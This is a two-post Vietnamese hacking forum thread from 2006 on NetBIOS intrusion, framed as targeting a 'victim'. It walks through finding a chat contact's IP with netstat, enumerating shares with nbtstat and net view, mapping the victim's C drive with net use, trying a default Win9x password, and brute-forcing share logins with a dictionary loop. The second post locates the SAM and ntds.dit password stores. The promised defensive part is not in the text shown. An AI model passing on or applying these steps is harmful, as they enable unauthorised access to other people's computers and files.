Nếu bạn đang sử dụng ICQ để chát với victim bạn có thể sử dụng lệnh netstat -n ( lệnh này sẽ cho ta biết các kết nối đựơc thiết lập giữa máy của ta và bên ngoài và qua các cổng nào ) để biết IP của victim. Ví dụ: sau khi chạy lệnh netstat -n ta sẽ nhận đựơc bảng sau : Active Connections Proto Local Address Foreign Address State TCP 192.168.0.1:3537 203.195.136.156:2869 Established Bạn chú ý nhìn ở dưới dòng chữ Foreign Address số 203.195.136.156 <= Đó là địa chỉ IP của victim, còn số 2869 chính là cổng kết nối. Chữ Established => báo cho bạn biết một kết nối đã được thiết lập giữa máy tính của bạn và victim. Còn nếu bạn sử dụng MSN hay YH, nếu sử dụng lệnh netstat - n có thể bạn không nhìn thấy IP của victim mà có thể là địa chỉ của Server của MSN hay YH. Để xác định chính xác bạn có thể sử dụng Send File của YH để gửi một file tới victim. Trước khi Send File, sử dụng lệnh netstat -n để xác định các kết nối đã có. Trong khi đang Send file bạn lại sử dụng lệnh netstat -n sau đó tìm địa chỉ IP nào mà mới được thiết lập => đó chình là dịa chỉ IP của Victim ( vì khi Send file nó se thiết lập một kết nối trực tiếp giữa máy bạn và victim ) Sau khi đã có địa chỉ IP của victim bạn sử dụng lênh nbtstat -a ipAddress ( lệnh này dùng để xác đinh một số thông tin trên máy victim ) Ví dụ : C:\> nbtstat - a 203.210.136.23 ( <= Đây là địa chỉ mô phỏng thôi đấy nhé - đừng thử greenbiggrin.gif ) Bạn có thể nhận được các dòng như sau NetBIOS remote Machine Name Table Name Type Status may1 <00> Unique Registered netde<00> Group Registered may1 <03> Unique Registered may1 <20> Unique Registered MAC address 00-32-04-14-23-E6 Ở đây bạn chú ý đến số <20> => Nếu thấy số này có nghĩa là máy victim đã bật chế độ chia sẻ File và máy in ( File And Printer Sharing ) Tiếp theo ta sử dụng lệnh net view \\ipaddress ( lệnh này dùng để xem máy vic tim chia sẻ những cái gì để còn ) Ví dụ : C:> net view \\203.210.136.23 Bạn có thể thấy các dòng tương tự như ở dưới đây : Shared resource at \\203.210.136.23 Share name Type User As Comment C Disk D Disk IPC$ Disk The command complete succesfully =D> Đến đây bạn vào tìm file LMHost - nếu không có thì tạo ra ( Nếu bạn sử dụng window98 thì nó nằm ngay trong thư mục windows, nếu là XP thì trong thư mục Windows\System32\Drivers \etc còn Win2000 thì nằm trong WinNT\System32\Drivers\etc ) Lạm bàn về LMHost : Ngày trước tên máy và địa chỉ IP được lưu vào trong đó - Nó được dùng để phân giải tên máy và địa chỉ IP ( Name - to - Address ) File này được cập nhật và quản lý bởi SRI - NIC ( Standford Research Institute Network Information Center ), vài tuần một lần tổ chức này lại cập nhật lại nội dung File này. Ngày trước các Admin của mạng thường Download về Server của mình. Dần dần số lượng của các trang Web trên Net ngày càng nhiều => cách sử dụng này trở nên thiếu hiệu quả và mất thời gian => DNS ra đời ( Cũng có bài viết chi tiết về DNS trên HVA portal ). Sau đó bạn thêm vào trong File này theo cú pháp sau : ipAddressvictim tênmáy #PRE Ví dụ ở đây tôi thêm vào dòng : 203.210.136.23 MAY1 #PRE trong File LMHost, rồi chạy lệnh nbtstat -R để nạp lại table cache. Bây giờ bạn có thể tạo thêm một ổ trên máy tính của mình và kết nối tới ở hay thư mục được Share trên máy tính của victim bằng cách sử dụng lênh Net use Net use Tên_ổ_đĩa : \\ipAddressVictim\shareName Ví dụ : Net use X: \\203.210.136.23\C Nếu thấy dòng lệnh The command was complete succesfully Done, bấm đúp vào My Computer và xem thử xem có gì mới trong máy tính của ta không. Để tránh nhầm lẫn khi ánh xạ ổ đĩa ta có thể sử dụng ký hiệu * thay cho tên ổ đĩa: net use * \\203.210.136.23\C Thế nhưng nhiều khi cuộc đời không đẹp như mơ vì khi thực hiện đường truyền của bạn chậm hay vì máy victim đặt pass truy nhập. Nếu máy victim sử dụng Windows95,98,98se hay Win me bạn có thể tạm dùng pass : PQWAK ( cái này giống như kiểu concat trên các Main đời cũ Thế thì còn máy tính dùng 2000 hay XP mà đặt pass và user thì làm thế nào => ta có thể xây dựng một từ điển để dò và sử dụng lệnh For của DOS để thực hiện. Ví dụ tôi sẽ tạo ra một File có tên là DoPass.txt và có định dạng sau : Code: password username password Administrator "" Administrator admin Administrator Và bấy giờ ta có thể sử dụng lệnh For C:\FOR /F "token=1,2* " %i in (DoPass.txt ) Do net use \\IpAddressvictim\ShareName ( cú pháp sử dụng của lệnh FOR xin các bạn xem trong help của Windows ) <còn tiếp> Tác giả: phuongdong 27/06/2006 02:57:34 Tiêu đề: Re: NetBIOS hacking và cách phòng chống (phuongdong) light.phoenix Ducks Joined: 29/10/2004 15:16:29 Bài gởi: 31 Offline Trước khi tiếp tục chúng ta cần tìm hiểu thêm một số thông tin về dòng Window2000 ( 2000 Pro, 2000 family và 2000 Advandce server ) và Windows XP. Mặc định sau khi cài đặt xong các hệ điều hành này thì tất cả các ổ đĩa của và một số thư mục của chúng sẽ được thiết lập ở chế độ Share ẩn. Thế Share ẩn là gì ? Bình thường nếu bạn đã làm việc trong môi trường mạng thì việc chia sẻ các ổ đĩa hay thư mục bằng cách bấm phím phải chuột trên ổ đĩa hay thư mục và chọn Sharing => Ổ đĩa hay thư mục đó sẽ xuất hiện trên mạng. Nhưng nếu bây giờ ta thêm vào sau tên của ổ đĩa hay thư mục chia sẻ ký hiệu $ thì việc chia sẻ vẫn xảy ra nhưng không hiện lên trên mạng và chỉ có người nào biết đường dẫn chính xác mới có thể sử dụng đựơc các tài nguyên này. Để xem được các thông tin về việc chia sẻ trên máy tính của mình bạn có thể vào Start\Program\Administrator Tools\Computer management sau đó chọn vào mục Shared Folders để kiểm tra lại máy của mình ( Nếu trong Program chưa có mục Administrator Tools bạn bấm phím phải chuột trên nút Start chọn properties sau đó chọn mục Display Administrator Tools ). Ví dụ bạn có thể nhìn thấy các thông tin sau : Sharename Resource Remark ADMIN$ C:\WINNT Remote Admin C$ C:\ Default Share for Internal Use D$ D:\ Default Share for Internal Use E$ E:\ Default Share for Internal Use print$ C:\WINNT\SYSTEM\SPOOL IPC$ Remote IPC Nếu bạn đang dùng XP thì ADMIN$ sẽ là C:\WINDOWS( Thư mục mặc định khi bạn cài XP ). Bạn có thể cắt tất cả các chế độ Share của các ổ trên máy tính nhưng riêng IPC$ thì không thể bỏ nó đi đựơc ( Trên 4rum đã có một bài nói về cách tất chế độ Share của IPC$ bằng cách sử dụng một số lệnh viết trong File autoexec.bat - Bạn có thể tìm lại bài đó để xem). Thế còn thông tin về user và pass được lưu ở đâu, trên các hệ thống NT và windows2000 và XP chạy ở nhà ( Stand - alone ) các thông tin này được lưu ở trong File %systemroot%\system32\config\sam. Với %systemroot % - chính là thư mục mà bạn cài đặt windows ( có thể là windows, winNT etc ). Và File đó gọi là File SAM - Security Accounts Manager. Các thông tin lưu trong này được mã hoá theo cái gọi là one- way function ( OWF) hoặc giải thuật Hash và kết quả là giá trị mà nó lưu giữ không thể đựơc giải mã (decrypted). Trong Windows2000 Domain Controller các thông tin này đựơc lưu trong Active Directory ( nếu khi cài đặt để ở chế độ mặc đinh thì nó nằmg trong %systemroot%\ntds\ntds.dit - File này vào khoảng 10Mb => Việc Down về để giải mã cũng như việc giả mã là không thể => thường nếu định dò pass của DC thì tốt nhất là" chuyển " ) SID Khi Windows2000 hay Windows2000 Domain được cài đặt nó sẽ sinh ra một số ngẫu nhiên cho mỗi User - Đây là một số 48 Bit được gọi là Security Indentifier (SID)